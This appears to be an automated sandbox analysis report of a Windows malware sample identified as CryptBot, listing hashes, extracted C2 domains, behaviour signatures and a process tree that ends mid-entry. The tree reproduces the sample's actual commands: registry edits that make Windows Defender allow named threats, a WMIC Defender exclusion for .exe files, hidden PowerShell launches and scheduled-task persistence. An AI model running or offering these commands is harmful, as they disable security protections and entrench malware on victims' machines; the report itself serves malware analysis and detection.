Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2024 15:51

General

  • Target

    file.exe

  • Size

    5KB

  • MD5

    72025394a2450241bce7df7e305cd07b

  • SHA1

    018b6c066c915ba37616661f86c09e453d58fd66

  • SHA256

    69b153cd6176d790d2aae37ccc5600bde475a0eca6d1f6f531a1e040d44bccd1

  • SHA512

    80b6dd62149a49cb849a148b4d5501765302f21696056d91789ba46a18aa8ecc7fb6f14569787dae716a975327d2fbb518212ab0de195588ff568da60e816fa2

  • SSDEEP

    48:6iHpgJkhMKfgrJ/J4KK4SRcMnZbECSaM7/ttOuliL/qXSfbNtm:TH+zCgdinZbq/Z0LxzNt

Malware Config

Extracted

Family

cryptbot

C2

fivevh5ht.top

analforeverlovyu.top

Attributes
  • url_path

    /v1/upload.php

Signatures

  • CryptBot

    CryptBot is a C++ stealer distributed widely in bundle with other software.

  • Detect Socks5Systemz Payload 1 IoCs
  • Socks5Systemz

    Socks5Systemz is a botnet written in C++.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Indirect Command Execution 1 TTPs 17 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 4 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 31 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3656
    • C:\Users\Admin\Documents\setup.exe
      "C:\Users\Admin\Documents\setup.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1172
      • C:\Users\Admin\AppData\Local\Temp\7zS7BA3.tmp\Install.exe
        .\Install.exe
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1776
        • C:\Users\Admin\AppData\Local\Temp\7zS7E82.tmp\Install.exe
          .\Install.exe /fKkeRdidQeQB "385121" /S
          4⤵
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Enumerates system info in registry
          • Suspicious use of WriteProcessMemory
          PID:4040
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2924
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
              6⤵
              • Indirect Command Execution
              • Suspicious use of WriteProcessMemory
              PID:4056
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4224
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  8⤵
                    PID:3704
              • C:\Windows\SysWOW64\forfiles.exe
                forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                6⤵
                • Indirect Command Execution
                • Suspicious use of WriteProcessMemory
                PID:3692
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:4448
                  • \??\c:\windows\SysWOW64\reg.exe
                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                    8⤵
                      PID:3268
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                  6⤵
                  • Indirect Command Execution
                  • Suspicious use of WriteProcessMemory
                  PID:4732
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2160
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:372
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                  6⤵
                  • Indirect Command Execution
                  • Suspicious use of WriteProcessMemory
                  PID:5048
                  • C:\Windows\SysWOW64\cmd.exe
                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                    7⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3896
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                      8⤵
                      • System Location Discovery: System Language Discovery
                      PID:1952
                • C:\Windows\SysWOW64\forfiles.exe
                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  6⤵
                  • Indirect Command Execution
                  • Suspicious use of WriteProcessMemory
                  PID:4780
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                    7⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:4892
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                      8⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:1840
                      • C:\Windows\SysWOW64\gpupdate.exe
                        "C:\Windows\system32\gpupdate.exe" /force
                        9⤵
                          PID:4368
                • C:\Windows\SysWOW64\forfiles.exe
                  "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                  5⤵
                  • Indirect Command Execution
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:3248
                  • C:\Windows\SysWOW64\cmd.exe
                    /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    6⤵
                      PID:2944
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                        7⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3820
                        • C:\Windows\SysWOW64\Wbem\WMIC.exe
                          "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                          8⤵
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4796
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /CREATE /TN "bHuqaEPbhrVtHIaGbF" /SC once /ST 15:52:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS7E82.tmp\Install.exe\" wW /YhvZdidA 385121 /S" /V1 /F
                    5⤵
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:3984
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 960
                    5⤵
                    • Program crash
                    PID:3404
            • C:\Users\Admin\Documents\Channel2.exe
              "C:\Users\Admin\Documents\Channel2.exe"
              2⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:2212
              • C:\Users\Admin\AppData\Local\Temp\service123.exe
                "C:\Users\Admin\AppData\Local\Temp\service123.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:3080
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\Admin\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4340
            • C:\Users\Admin\Documents\stories.exe
              "C:\Users\Admin\Documents\stories.exe"
              2⤵
              • Executes dropped EXE
              PID:5084
              • C:\Users\Admin\AppData\Local\Temp\is-NEPUJ.tmp\stories.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-NEPUJ.tmp\stories.tmp" /SL5="$11029C,3004919,56832,C:\Users\Admin\Documents\stories.exe"
                3⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of FindShellTrayWindow
                PID:3792
                • C:\Users\Admin\AppData\Local\Gerda Play3 SE\gerdaplay3se32.exe
                  "C:\Users\Admin\AppData\Local\Gerda Play3 SE\gerdaplay3se32.exe" -i
                  4⤵
                  • Executes dropped EXE
                  PID:4968
            • C:\Users\Admin\Documents\CheckTool.exe
              "C:\Users\Admin\Documents\CheckTool.exe"
              2⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              PID:4908
              • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                3⤵
                • System Location Discovery: System Language Discovery
                PID:1332
          • C:\Windows\system32\OpenWith.exe
            C:\Windows\system32\OpenWith.exe -Embedding
            1⤵
            • Modifies registry class
            • Suspicious use of SetWindowsHookEx
            PID:4544
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3000,i,2727319350781907497,7925939240893079607,262144 --variations-seed-version --mojo-platform-channel-handle=4240 /prefetch:8
            1⤵
              PID:1768
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=3076,i,2727319350781907497,7925939240893079607,262144 --variations-seed-version --mojo-platform-channel-handle=3100 /prefetch:3
              1⤵
                PID:2476
              • C:\Users\Admin\AppData\Local\Temp\7zS7E82.tmp\Install.exe
                C:\Users\Admin\AppData\Local\Temp\7zS7E82.tmp\Install.exe wW /YhvZdidA 385121 /S
                1⤵
                • Executes dropped EXE
                • Drops desktop.ini file(s)
                • Drops file in System32 directory
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                PID:4732
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                  2⤵
                    PID:1892
                    • C:\Windows\SysWOW64\forfiles.exe
                      forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                      3⤵
                      • Indirect Command Execution
                      PID:660
                      • C:\Windows\SysWOW64\cmd.exe
                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                        4⤵
                          PID:4988
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                            5⤵
                              PID:2248
                        • C:\Windows\SysWOW64\forfiles.exe
                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                          3⤵
                          • Indirect Command Execution
                          PID:960
                          • C:\Windows\SysWOW64\cmd.exe
                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            4⤵
                              PID:4740
                              • \??\c:\windows\SysWOW64\reg.exe
                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                5⤵
                                  PID:3068
                            • C:\Windows\SysWOW64\forfiles.exe
                              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                              3⤵
                              • Indirect Command Execution
                              PID:3744
                              • C:\Windows\SysWOW64\cmd.exe
                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                4⤵
                                  PID:2596
                                  • \??\c:\windows\SysWOW64\reg.exe
                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                    5⤵
                                      PID:3252
                                • C:\Windows\SysWOW64\forfiles.exe
                                  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                  3⤵
                                  • Indirect Command Execution
                                  PID:3520
                                  • C:\Windows\SysWOW64\cmd.exe
                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                    4⤵
                                      PID:2376
                                      • \??\c:\windows\SysWOW64\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                        5⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4324
                                  • C:\Windows\SysWOW64\forfiles.exe
                                    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                    3⤵
                                    • Indirect Command Execution
                                    • System Location Discovery: System Language Discovery
                                    PID:4520
                                    • C:\Windows\SysWOW64\cmd.exe
                                      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      4⤵
                                        PID:1444
                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                          5⤵
                                          • Command and Scripting Interpreter: PowerShell
                                          • Drops file in System32 directory
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:2100
                                          • C:\Windows\SysWOW64\gpupdate.exe
                                            "C:\Windows\system32\gpupdate.exe" /force
                                            6⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1488
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                    2⤵
                                    • Drops file in System32 directory
                                    • System Location Discovery: System Language Discovery
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1316
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:4988
                                        • C:\Windows\SysWOW64\reg.exe
                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                          4⤵
                                            PID:2680
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                          3⤵
                                            PID:3352
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                            3⤵
                                              PID:2260
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                              3⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:2344
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:2560
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:5012
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3516
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2072
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1008
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                  3⤵
                                                    PID:1936
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2484
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3332
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                    3⤵
                                                      PID:4364
                                                    • C:\Windows\SysWOW64\reg.exe
